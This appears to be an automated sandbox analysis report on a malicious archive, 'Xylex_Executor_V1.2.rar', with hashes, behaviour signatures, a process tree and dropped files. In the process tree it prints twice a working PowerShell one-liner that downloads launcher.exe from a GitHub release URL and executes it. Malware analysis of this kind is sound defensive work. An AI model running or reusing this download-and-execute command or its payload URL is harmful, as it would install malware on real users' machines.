b462fb0c6aa61e992f7777643f124ed7742a89c121df99929d3bcd8f3a92e28d

General

Target

Xylex_Executor_V1.2.rar
Size

10.8MB
MD5

720cc843dc613c7e5266016adecafcc5
SHA1

aa62cd7fa0a407f35d14dbc94f79eedbde15450b
SHA256

b462fb0c6aa61e992f7777643f124ed7742a89c121df99929d3bcd8f3a92e28d
SHA512

ca757b7cb7089db7274dab30c90ee77c09a58a8d5817f3b6dff55154696876050b5075c55f1f3d8db625f86f8f0c5b73021336e83558d79d401090cfd1a34a85
SSDEEP

196608:QaV7QUcqKJtri2jrz7OLEVxHIRHXJ5OM2zXVNVAlbixK30ObibbDOix9phR:QfRD+LiuJ5OMANOlbCK3tCD7hR

Score

10^/10

pyinstaller upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/ptsd9/script/releases/download/launcher/launcher.exe

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	1656	powershell.exe
6	1656	powershell.exe
8	2844	powershell.exe
9	2844	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1588	launcher.exe
1344	launcher.exe

Loads dropped DLL 4 IoCs

pid	Process
2632	7zFM.exe
1588	launcher.exe
1344	launcher.exe
1196	Process not Found

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000016d16-125.dat	upx
behavioral1/memory/1344-127-0x000007FEEEDE0000-0x000007FEEF3C7000-memory.dmp	upx

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0009000000014dae-72.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1656	powershell.exe
2632	7zFM.exe
2844	powershell.exe
2632	7zFM.exe
2632	7zFM.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2632	7zFM.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	2632	7zFM.exe
Token: 35	2632	7zFM.exe
Token: SeSecurityPrivilege	2632	7zFM.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeSecurityPrivilege	2632	7zFM.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeSecurityPrivilege	2632	7zFM.exe

Suspicious use of FindShellTrayWindow 5 IoCs

pid	Process
2632	7zFM.exe
2632	7zFM.exe
2632	7zFM.exe
2632	7zFM.exe
2632	7zFM.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 2028 wrote to memory of 2632	2028	cmd.exe	29
PID 2028 wrote to memory of 2632	2028	cmd.exe	29
PID 2028 wrote to memory of 2632	2028	cmd.exe	29
PID 2632 wrote to memory of 2752	2632	7zFM.exe	30
PID 2632 wrote to memory of 2752	2632	7zFM.exe	30
PID 2632 wrote to memory of 2752	2632	7zFM.exe	30
PID 2752 wrote to memory of 1656	2752	cmd.exe	32
PID 2752 wrote to memory of 1656	2752	cmd.exe	32
PID 2752 wrote to memory of 1656	2752	cmd.exe	32
PID 2632 wrote to memory of 2792	2632	7zFM.exe	33
PID 2632 wrote to memory of 2792	2632	7zFM.exe	33
PID 2632 wrote to memory of 2792	2632	7zFM.exe	33
PID 2792 wrote to memory of 2844	2792	cmd.exe	35
PID 2792 wrote to memory of 2844	2792	cmd.exe	35
PID 2792 wrote to memory of 2844	2792	cmd.exe	35
PID 2632 wrote to memory of 1588	2632	7zFM.exe	36
PID 2632 wrote to memory of 1588	2632	7zFM.exe	36
PID 2632 wrote to memory of 1588	2632	7zFM.exe	36
PID 1588 wrote to memory of 1344	1588	launcher.exe	37
PID 1588 wrote to memory of 1344	1588	launcher.exe	37
PID 1588 wrote to memory of 1344	1588	launcher.exe	37

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Xylex_Executor_V1.2.rar
1⤵
- Suspicious use of WriteProcessMemory
PID:2028
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Xylex_Executor_V1.2.rar"
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zO84A9B236\Xylex V1.2.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $down=New-Object System.Net.WebClient;$url='https://github.com/ptsd9/script/releases/download/launcher/launcher.exe';$file='launcher.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1656
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zO84AB1216\Xylex V1.2.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $down=New-Object System.Net.WebClient;$url='https://github.com/ptsd9/script/releases/download/launcher/launcher.exe';$file='launcher.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2844
- - C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zO84A9B236\Xylex V1.2.bat

Filesize
355B

MD5
6ef57091ddca52dc85c39d905f1e7abb

SHA1
df53ab324b8ce2ed2dcf5d95fe34a3916e9442d1

SHA256
ef724fbf241a2289f955746936ca9163808d393d0bd894e00f8463cede1ce00e

SHA512
515519b4d58fede62f4dc34c3c933a6a559b81c3b755e604ec553c22b235a95f0fc22c32d75e06f1b42f3e2579b13c919e635be6394d3834ffb48ecc6bce7950

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI15882\python311.dll

Filesize
1.6MB

MD5
bd98d92c8c8b8c5983ef725a9bc953a9

SHA1
1ad5435b23116ad85a55a55754c42bb788c36388

SHA256
e41f2d9e02e8498ec53f8286e86011c75e9da0f6b24b2d9979e6e5726ef28913

SHA512
48fa76a57c12088d3e24b56e1ace114f028aac5ae383f7810b02dce2768820a7190fc1cc3fd4684a2f06e98c1ccc0641a3f1906e992d7a5736194989c072959e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
12e638d531b46c08e20f28eef34bd442

SHA1
bfc15bde0b37080c00bd51763fd15668e94d49e7

SHA256
7a90abd0168f8bbf61cf99a6d38b5b7b94c5389b1dcc1839dbf74e9ac0cb106a

SHA512
3fb10fed3c503252860eee0b6d7e074df64d1d9506576961d29fd98aa647c9b1376c5b1ffb626031816403741b9fdcee1fcb07024048e41cfe0c3831cc2e4347

Download Submit
\Users\Admin\AppData\Local\Temp\7zO84AE5176\launcher.exe

Filesize
10.9MB

MD5
15916166c043ce50f37b0a65f4c5d751

SHA1
1ef18a33a5c982514382aba053bee695281ca291

SHA256
09ff479a5a9d03f909fd4832b51dbafab4758717624852e697edc8eea26c4086

SHA512
1bac7ddd8dfd6b9debf75ea98025770db752889fac5b4b33c1a928097cc57f4f8662ee6173e88840ff9f08e325e2fff2238b6e18fa5b64e26ab9bfd1a7da439d

Download Submit
memory/1344-127-0x000007FEEEDE0000-0x000007FEEF3C7000-memory.dmp

Filesize
5.9MB

Download
memory/1656-44-0x000000001B500000-0x000000001B7E2000-memory.dmp

Filesize
2.9MB

Download
memory/1656-45-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2844-67-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2844-68-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing